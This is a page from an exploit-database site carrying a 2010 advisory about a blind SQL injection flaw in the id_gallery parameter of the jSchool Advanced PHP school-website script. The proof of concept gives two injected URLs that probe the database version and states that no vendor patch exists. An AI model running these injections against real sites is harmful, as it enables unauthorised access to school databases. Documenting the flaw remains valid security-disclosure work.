[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

jSchool Advanced Blind SQL Injection Vulnerability

Author
Don Tukulesto
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14949
Category
web applications
Date add
23-11-2010
Platform
php
==================================================
jSchool Advanced Blind SQL Injection Vulnerability
==================================================

Author      : Don Tukulesto (root@indonesiancoder.com)
Site        : http://indonesiancoder.com
Vendor      : http://jogjacamp.com
Software        : jSchool Advanced (http://www.jogjacamp.com/script_4_Script_Website_Murah_Instant_Sekolah.html)
Price       : Rp. 1.200.000
GMT +07:00 November 21, 2010
-----------------------------------------------------------------------
 
 
 
I.  Demo Site
-----------------------------------------------------------------------
http://server/index.php?action=gallery.list&id_gallery=5
 
II. POC
-----------------------------------------------------------------------
http://server/index.php?action=gallery.list&id_gallery=5 and substring(@@version,1,1)=5 # TRUE
http://server/index.php?action=gallery.list&id_gallery=5 and substring(@@version,1,1)=4 # FALSE
 
III. Vendor patch
-----------------------------------------------------------------------
Currently manufacturers do not provide patches or upgrades.



#  0day.today [2024-11-15]  #